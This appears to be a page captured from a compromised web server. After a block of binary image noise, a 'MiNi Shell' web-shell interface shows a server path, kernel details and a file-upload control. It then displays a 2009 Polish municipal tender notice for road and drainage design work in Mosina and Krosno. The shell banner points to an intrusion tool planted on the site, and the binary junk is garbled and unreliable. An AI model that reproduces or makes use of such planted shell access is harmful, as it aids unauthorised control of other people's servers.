JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090522/163430-N-2009.html

<p class="kh_header"><b>Mosina: WYKONANIE OPRACOWANIA DOKUMENTACJI BUDOWLANO-WYKONAWCZEJ BUDOWY ULICY REJA, REYMONTA, SIENKIEWICZA, PRUSA, GAŁCZYŃSKIEGO W MIEJSCOWOŚCI MOSINA ORAZ LEŚNEJ i BOCZNEJ W MIEJSCOWOŚCI KROSNO</b><br>
<b>Numer ogłoszenia: 163430 - 2009; data zamieszczenia: 22.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Mosinie , Pl. 20 Października 1, 62-050 Mosina, woj. wielkopolskie, tel. 061 8132251, faks 061 8132941.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE OPRACOWANIA DOKUMENTACJI BUDOWLANO-WYKONAWCZEJ BUDOWY ULICY REJA, REYMONTA, SIENKIEWICZA, PRUSA, GAŁCZYŃSKIEGO W MIEJSCOWOŚCI MOSINA ORAZ LEŚNEJ i BOCZNEJ W MIEJSCOWOŚCI KROSNO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Opis przedmiotu zamówienia:  
1. Określenie przedmiotu zamówienia.
Przedmiotem zamówienia są usługi polegające na opracowaniu czterech dokumentacji projektowych budowlano-wykonawczych budowy gminnej ulicy wraz z uzyskaniem decyzji o pozwoleniu na budowę: 
Zadanie nr 1: Budowa ulicy Reja, Reymonta, Sienkiewicza i Prusa w miejscowości Mosina wraz z     
                      odwodnieniem.
Zadanie nr 2: Budowa ulicy Gałczyńskiego w miejscowości Mosina wraz z odwodnieniem.
Zadanie nr 3: Budowa ulicy Leśnej w miejscowości Krosno wraz z odwodnieniem.
Zadanie nr 4: Budowa ulicy Bocznej w miejscowości Krosno wraz z odwodnieniem.

2. Szczegółowe określenie przedmiotu zamówienia

2.1. Szczegółowe określenie przedmiotu zamówienia:

Zadanie nr 1: Budowa ulicy Reja,  Reymonta, Sienkiewicza i Prusa w miejscowości Mosina wraz z    
                      odwodnieniem.
Zamówienie obejmuje opracowanie:
a.	koncepcji drogowej
b.	dokumentacji budowlano-wykonawczej budowy ulicy Reja na odcinku od ul. Budzyńskiej do ul. Kilińskiego-ok. 295,0 mb, Reymonta  na odcinku od ul. Sienkiewicza do ul. Kilińskiego-ok. 251,0 mb, Sienkiewicza na odcinku od ul. Mickiewicza do ul. bez nazwy-ok. 160,0 mb, Prusa na odcinku od ul. Mickiewicza do ul. Reja-ok. 265,0 mb-wraz z odwodnieniem,
c.	kosztorysów inwestorskich
Projekt budowlano-wykonawczy powinien zawierać następujące opracowania branżowe:
1.	projekt drogowy
2.	dokumentacja geotechniczna,
3.	projekt stałej organizacji ruchu,
4.	projekt odwodnienia jezdni kanałami deszczowymi, włączanymi do istniejącego systemu odwodnienia w sąsiednich ulicach,
5.	inwentaryzacja zieleni, ustalenie potrzeby wycinki drzew i krzewów wraz z uzgodnieniem jej - przygotowanie planu wyrębu,
6.	inne opracowania branżowe niezbędne do realizacji przedmiotu zamówienia wraz z niezbędnymi uzgodnieniami  i opiniami - projekty przebudowy kolidującego uzbrojenia podziemnego i nadziemnego, w zakresie wynikającym z potrzeb przedmiotowej inwestycji oraz uzasadnionych wymogów poszczególnych administratorów sieci; zakres przebudowy istniejącego uzbrojenia powinien zapewnić możliwość prawidłowego dostosowania istniejącej infrastruktury do nowych warunków,
7.	opracowanie dotyczące BIOZ,
8.	specyfikacja techniczna wykonania i odbioru robót oraz przedmiar robót,
9.	decyzja o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
10.	decyzja o lokalizacji inwestycji celu publicznego,	 a w przypadku wystąpienia nieruchomości prywatnych - decyzja o zezwoleniu na realizację inwestycji drogowej - na warunkach określonych przepisami ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych-Dz. U. Nr 80, poz. 721, z późn. zm.
11.	decyzja o pozwoleniu na budowę.

Zadanie nr 2: Budowa ulicy Gałczyńskiego w miejscowości Mosina wraz z odwodnieniem.
Zamówienie obejmuje opracowanie: 
a.	koncepcji drogowej
b.	dokumentacji budowlano-wykonawczej budowy ulicy Gałczyńskiego na odcinku od ul. Sowinieckiej do ul. B. Leśmiana-ok. 1020,0 mb-wraz z odwodnieniem,
c.	kosztorysów inwestorskich
Projekt budowlano-wykonawczy powinien zawierać następujące opracowania branżowe:
1.	projekt drogowy
2.	dokumentacja geotechniczna,
3.	projekt stałej organizacji ruchu,
4.	projekt odwodnienia jezdni kanałami deszczowymi, włączanymi do istniejącego systemu odwodnienia:
- kanał ulicami: Gałczyńskiego - Marcinkowskiego - Sowińskiego do skrzyżowania z ul. Targową-ok. 1350 mb,
-  kanał  ulicami: Gałczyńskiego - Brzechwy - Wiosny Ludów do skrzyżowania z ul. Sowińskiego-ok. 1180,0 mb,
zgodnie z Koncepcją programowo-przestrzenną odwodnienia Osiedla -Za Barwą- z 2004r.,
wraz z projektem przykanalików i studzienek ściekowych w ul. Marcinkowskiego, ul. Wiosny Ludów  i ul. Sowińskiego - na odcinku od ul. Marcinkowskiego do ul Targowej-,
5.	inwentaryzacja zieleni, ustalenie potrzeby wycinki drzew i krzewów wraz z uzgodnieniem jej - przygotowanie planu wyrębu,
6.	inne opracowania branżowe niezbędne do realizacji przedmiotu zamówienia wraz z niezbędnymi uzgodnieniami  i opiniami - projekty przebudowy kolidującego uzbrojenia podziemnego i nadziemnego, w zakresie wynikającym z potrzeb przedmiotowej inwestycji oraz uzasadnionych wymogów poszczególnych administratorów sieci; zakres przebudowy istniejącego uzbrojenia powinien zapewnić możliwość prawidłowego dostosowania istniejącej infrastruktury do nowych warunków, w tym projekt sanitarny rozwiązania kolizji: przełożenie dwóch przęseł kanalizacji sanitarnej - istniejącej w ul. Sowińskiego - na odcinku od skrzyżowania z ul. Targową,
7.	opracowanie dotyczące BIOZ,
8.	specyfikacja techniczna wykonania i odbioru robót oraz przedmiar robót,
9.	decyzja o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
10.	decyzja o lokalizacji inwestycji celu publicznego, a w przypadku wystąpienia nieruchomości prywatnych - decyzja o zezwoleniu na realizację inwestycji drogowej - na warunkach określonych przepisami ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. Nr 80, poz. 721, z późn. zm.)
11.	decyzja o pozwoleniu na budowę.

Zadanie nr 3: Budowa ulicy Leśnej w miejscowości Krosno wraz z odwodnieniem.
Zamówienie obejmuje opracowanie: 
a.	koncepcji drogowej
b.	dokumentacji budowlano-wykonawczej budowy ulicy Leśnej na odcinku od ul. Głównej do przejazdu kolejowego (ok. 180,0 mb)  wraz z odwodnieniem,
c.	kosztorysów inwestorskich
Projekt budowlano-wykonawczy powinien zawierać następujące opracowania branżowe:
1.	projekt drogowy
2.	dokumentacja geotechniczna,
3.	projekt stałej organizacji ruchu,
4.	projekt odwodnienia jezdni kanałem deszczowym, włączanym do istniejącego systemu odwodnienia w sąsiedniej ulicy Głównej,
5.	inwentaryzacja zieleni, ustalenie potrzeby wycinki drzew i krzewów wraz z uzgodnieniem jej - przygotowanie planu wyrębu,
6.	inne opracowania branżowe niezbędne do realizacji przedmiotu zamówienia wraz z niezbędnymi uzgodnieniami  i opiniami - projekty przebudowy kolidującego uzbrojenia podziemnego i nadziemnego, w zakresie wynikającym z potrzeb przedmiotowej inwestycji oraz uzasadnionych wymogów poszczególnych administratorów sieci; zakres przebudowy istniejącego uzbrojenia powinien zapewnić możliwość prawidłowego dostosowania istniejącej infrastruktury do nowych warunków,
7.	opracowanie dotyczące BIOZ,
8.	specyfikacja techniczna wykonania i odbioru robót oraz przedmiar robót,
9.	decyzja o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
10.	decyzja o lokalizacji inwestycji celu publicznego, a w przypadku wystąpienia nieruchomości prywatnych - decyzja o zezwoleniu na realizację inwestycji drogowej - na warunkach określonych przepisami ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych-Dz. U. Nr 80, poz. 721, z późn. zm.-
11.	decyzja o pozwoleniu na budowę.

Zadanie nr 4: Budowa ulicy Bocznej w miejscowości Krosno wraz z odwodnieniem.
Zamówienie obejmuje opracowanie:  
a.	koncepcji drogowej 
b.	dokumentacji budowlano-wykonawczej budowy ulicy Bocznej na odcinku od ul. Głównej do ul. bez nazwy  - kontynuacja ul. Strzeleckiej-ok. 630,0 mb-wraz z projektem,
c.	kosztorysów inwestorskich
Projekt budowlano-wykonawczy powinien zawierać następujące opracowania branżowe:
1.	projekt drogowy
2.	dokumentacja geotechniczna,
3.	projekt stałej organizacji ruchu,
4.	projekt odwodnienia jezdni studzienkami ściekowych i przykanalikami, podłączonych do istniejącej w ulicy kanalizacji deszczowej
5.	inwentaryzacja zieleni, ustalenie potrzeby wycinki drzew i krzewów wraz z uzgodnieniem jej - przygotowanie planu wyrębu,
6.	inne opracowania branżowe niezbędne do realizacji przedmiotu zamówienia wraz z niezbędnymi uzgodnieniami  i opiniami - projekty przebudowy kolidującego uzbrojenia podziemnego i nadziemnego, w zakresie wynikającym z potrzeb przedmiotowej inwestycji oraz uzasadnionych wymogów poszczególnych administratorów sieci; zakres przebudowy istniejącego uzbrojenia powinien zapewnić możliwość prawidłowego dostosowania istniejącej infrastruktury do nowych warunków,
7.	opracowanie dotyczące BIOZ,
8.	specyfikacja techniczna wykonania i odbioru robót oraz przedmiar robót,
9.	decyzja o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia,
10.	decyzja o lokalizacji inwestycji celu publicznego, a w przypadku wystąpienia nieruchomości prywatnych - decyzja o zezwoleniu na realizację inwestycji drogowej - na warunkach określonych przepisami ustawy z dnia 10 kwietnia 2003r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych-Dz. U. Nr 80, poz. 721, z późn. zm.-
11.	decyzja o pozwoleniu na budowę.

2.2. Zakres przedmiotu zamówienia.
Dokumentacja projektowa dla każdego zadania wymagana przez Zamawiającego do pozwolenia na budowę:
a.	uzyskanie aktualnych podkładów geodezyjnych w skali 1:500, niezbędnych do opracowania dokumentacji projektowej;
b.	uzyskanie mapy ewidencyjnej terenu projektowanego wraz z wypisami z rejestru ewidencji gruntu;
c.	uzyskanie decyzji o ustaleniu lokalizacji inwestycji celu publicznego;
d.	uzyskanie wszelkich niezbędnych uzgodnień i pozwoleń narzuconych przez wydane w trakcie uzgodnień decyzje;
e.	opracowanie koncepcji drogowej, zawierającej propozycje rozwiązania drogowego na planie sytuacyjnym i w przekroju poprzecznym - w liczbie 2 egzemplarzy; 
f.	opracowanie projektu stałej organizacji ruchu, zatwierdzonej przez organ zarządzający ruchem - w liczbie 4 egzemplarzy
g.	opracowanie projektu budowlano-wykonawczego-obejmującego wszystkie wymagane branże-. Powinien on zawierać wszystkie elementy pozwalające uzyskać decyzję o pozwoleniu na budowę. Jednocześnie projekt budowlany ma spełniać warunki projektu wykonawczego i pozwolić wykonawcy robót wykonać zadanie - w liczbie 8 egzemplarzy;
h.	opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowanie zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości materiałów, wymagania dotyczące sposobu wykonania  i oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac - w liczbie 4  egzemplarzy;
i)	opracowanie przedmiaru robót, przez które należy rozumieć opracowanie zawierające opis robot budowlanych w kolejności technologicznej ich wykonania, z podaniem liczby jednostek przedmiarowych robót wynikających z dokumentacji projektowej oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych - w liczbie 4 egzemplarzy;
j.	opracowanie dokumentacji geotechnicznej - w liczbie 4 egzemplarzy,
k.	opracowanie kosztorysu inwestorskiego - w liczbie 2 egzemplarzy;
l.	uzyskanie decyzji o pozwoleniu na budowę.

Całość dokumentacji projektowej należy dostarczyć Zamawiającemu również w formie elektronicznej w formacie ogólnodostępnym -Word, Excel, PDF- na płycie CD.

 2.3. Wykonawca opracuje projekt, przedmiary robót i specyfikację techniczną wykonania i odbioru robót zgodnie z obowiązującymi przepisami w ten sposób, żeby jego realizację można było powierzyć wykonawcy robót budowlanych, wybranemu zgodnie z ustawą z dnia 29 stycznia 2004r. Prawo zamówień publicznych -Dz. U. z 2007r Nr 233, poz. 1655- oraz Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym -Dz. U, Nr 130, poz. 1389-, z dnia 2 września 2004r. w sprawie szczegółowego zakresu  i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego -Dz. U. Nr 202, poz. 2072 ze późn. zm.- oraz informację dotyczącą bezpieczeństwa i ochrony zdrowia w przypadkach gdy jej opracowanie jest wymagane na podstawie odrębnych przepisów.


2.4.  Dokumentacja projektowa powinna spełniać warunki wynikające z:

-	Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich usytuowanie -Dz.U. Nr 63, poz. 735-, z dopuszczalnymi odstępstwami dla obiektów remontowanych,
-	Rozporządzenia Rady Ministrów  z dnia 9 listopada 2004r. w sprawie określenia rodzajów przedsięwzięć mogących znacząco oddziaływać na środowisko oraz szczegółowych uwarunkowań związanych z kwalifikowaniem przedsięwzięcia do sporządzenia raportu o oddziaływaniu na środowisko -Dz.U. Nr 257, poz. 2573 z późn. zm.-,
-	Ustawy z dnia 21 marca 1985r. o drogach publicznych -Dz.U. z 2007r. Nr 19, poz. 115 z późn. zm-,
-	Ustawy z dnia 18 lipca 2001r. Prawo wodne -Dz.U. z 2005r. Nr 239, poz.2019 z późn. zm.-,
-	Ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym -Dz.U. Nr 80, poz. 717 z późn. zm.-, 
-	Ustawy z dnia 27 kwietnia 2001r. Prawo ochrony środowiska -Dz.U. z 2008r. Nr 25, poz. 150-, 
-	Ustawy z dnia 7 lipca 1994r. Prawo budowlane -Dz. U. z 2006r. Nr 156, poz. 1118 z późn. zm.-,
-	Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym -Dz. U, Nr 130, poz. 1389-,
-	Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu  i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego -Dz. U. Nr 202, poz. 2072 ze późn. zm.-,
-	Rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego -Dz. U. Nr 120, poz. 1133-,
-	obowiązujących norm,
-	innych przepisów prawnych.
Symbol Wspólnego Słownika Zamówień -CPV-:
71.32.00.00-7 usługi inżynieryjne w zakresie projektowania.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się wykonawcy, którzy:  1.1 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
1.2 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,  lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, t.j.:
1.2.1 wykonali w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dokumentację projektową odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, tj. polegającą na opracowaniu dokumentacji budowlanej budowy ulicy wraz z odwodnieniem o wartości minimum 35.000,00 zł brutto.
1.2.2 Dysponują lub będą dysponować następującymi osobami które będą uczestniczyć w wykonywaniu zamówienia, tj. co najmniej jedną osobą posiadającą uprawnienia budowlane projektowe w specjalności drogowej i sanitarnej oraz będącymi członkami właściwej terytorialnie izby samorządu zawodowego;
1.3 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
 5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenia i dokumenty określone w rozdziale VI SIWZ metodą warunku granicznego - spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca składa - w celu potwierdzenia spełnienia warunków określonych w Rozdziale V specyfikacji - następujące dokumenty i oświadczenia:
 1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu składa następujące dokumenty:
1.1 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.   1.2 Oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 2 do siwz. 

2. W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
2.1 Wykaz wykonanych usług - w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania -zgodnie z załącznikiem nr 3 do siwz- wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie. Pod pojęciem -usług odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia- należy rozumieć wykonane co najmniej 1 dokumentację projektową odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, tj. polegającą na opracowaniu dokumentacji budowlanej budowy ulicy wraz z odwodnieniem o wartości minimum 35.000,00 zł brutto.
2.2 Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności -zgodnie z załącznikiem nr 4 do siwz-, tj. co najmniej jedną osobą posiadającą uprawnienia budowlane projektowe w specjalności drogowej i sanitarnej oraz  będącymi członkami właściwej terytorialnie izby samorządu zawodowego;
2.3 Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w pkt 2.2 wykonawca wskazał osoby, którymi będzie dysponował.
2.4 Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, tj. uprawnienia budowlane projektowe w specjalności drogowej i sanitarnej oraz aktualne zaświadczenie, że są członkiem właściwej terytorialnie izby samorządu zawodowego.



3. W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty:  
4. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:  4.1 Zamiast dokumentu, o którym mowa w pkt. 1.1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 4.2 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. 4 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. 4.1.     
5. Dokumenty wymagane w przypadku składania oferty wspólnej:   5.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.  
5.2 Jeżeli oferta wspólna złożona przez dwóch lub więcej wykonawców zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza przed podpisaniem umowy w sprawie zamówienia publicznego Zamawiający zażąda w wyznaczonym terminie złożenia umowy regulującej współpracę tych wykonawców, podpisanej przez wszystkich partnerów, przy czym termin, na jaki została zawarta nie może być krótszy niż termin realizacji zamówienia - jeżeli umowa ta nie została złożona wraz z ofertą.
5.3 Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. 1.1, 1.2 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.    
6. Postanowienia dotyczące składanych dokumentów  6.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę z dopiskiem -za zgodność z oryginałem-.  6.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
